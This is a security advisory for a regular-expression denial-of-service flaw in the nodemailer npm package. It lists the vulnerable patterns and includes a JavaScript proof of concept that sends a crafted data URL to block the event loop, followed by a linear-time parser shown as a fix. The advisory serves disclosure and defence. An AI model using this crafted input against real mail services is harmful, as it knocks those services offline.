GHSA-9h6g-pr28-7cqp – nodemailer
Package
Manager: npm
Name: nodemailer
Vulnerable Version: >=0 <6.9.9
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
EPSS: N/A (percentile: N/A)
Details
nodemailer ReDoS when trying to send a specially crafted email

### Summary

A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, blocking the event loop. A second flaw was found when nodemailer tries to parse an attachment with an embedded file, which also blocks the event loop.

### Details

Regex: `/^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/`
Path: compile -> getAttachments -> _processDataUrl

Regex: `/(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/`
Path: _convertDataImages

### PoC

https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6
https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698

```js
async function exploit() {
  const MailComposer = require("nodemailer/lib/mail-composer");
  const MailComposerObject = new MailComposer();

  // Create a malicious data URL that will cause excessive backtracking.
  // The repeated ';'-separated run gives the nested quantifier in the
  // data-URL regex many ways to split the input, so matching takes
  // super-linear time and the event loop is blocked.
  const maliciousDataUrl =
    'data:image/png;base64,' +
    'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) +
    '==';

  // Call the vulnerable method with the crafted input
  const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
  return result;
}

// Top-level await is not available in a CommonJS script, so the async
// function is invoked and its rejection (if any) is logged instead.
exploit().catch(console.error);
```

### Impact

ReDoS blocks the event loop; a specially crafted malicious email can trigger this.
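For comparison with the backtracking-prone `^data:((?:[^;]*;)*(?:[^,]*)),(.*)$` pattern above, the following is an added example (not nodemailer's code) of a data: URL parser that runs in linear time: it locates the first comma with `indexOf` and splits the header on `;` in a single pass, so semicolon-heavy input cannot cause super-linear matching. It assumes Node.js (`Buffer`), and the sample inputs are constructed here.

```javascript
// Linear-time data: URL parser (added example, not part of nodemailer).
// Layout per RFC 2397: data:[<mediatype>][;param=value]*[;base64],<data>
function parseDataUrl(url) {
  if (typeof url !== 'string' || !url.startsWith('data:')) {
    return null;
  }
  // indexOf scans once and never backtracks, unlike a nested-quantifier regex.
  const comma = url.indexOf(',', 5);
  if (comma === -1) {
    return null; // no payload separator: not a well-formed data URL
  }
  const header = url.slice(5, comma);
  const data = url.slice(comma + 1);
  const parts = header.split(';');
  const mediaType = parts[0] || 'text/plain';
  const params = {};
  let base64 = false;
  for (const p of parts.slice(1)) {
    if (p.toLowerCase() === 'base64') {
      base64 = true;
      continue;
    }
    const eq = p.indexOf('=');
    if (eq > 0) {
      params[p.slice(0, eq)] = p.slice(eq + 1);
    }
  }
  return { mediaType, params, base64, data };
}

// Decode the payload the way an attachment loader would need it:
// base64 payloads are decoded, percent-encoded payloads are unescaped.
function dataUrlToBuffer(url) {
  const parsed = parseDataUrl(url);
  if (!parsed) {
    return null;
  }
  return parsed.base64
    ? Buffer.from(parsed.data, 'base64')
    : Buffer.from(decodeURIComponent(parsed.data), 'utf8');
}

// Constructed sample inputs (not taken from the advisory).
const SAMPLE_PNG = 'data:image/png;base64,' + Buffer.from('PNG?').toString('base64');
const SAMPLE_TEXT = 'data:text/plain;charset=utf-8,hello%20world';
```

The same structural result is returned for a header containing tens of thousands of `;`-separated fields, because the cost is one scan plus one split rather than a search over every way to partition the fields.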
Metadata
Created: 2024-01-31T22:42:54Z
Modified: 2025-09-03T15:21:03Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json
CWE IDs: ["CWE-1333"]
Alternative ID: N/A
Finding: F211
Auto approve: 1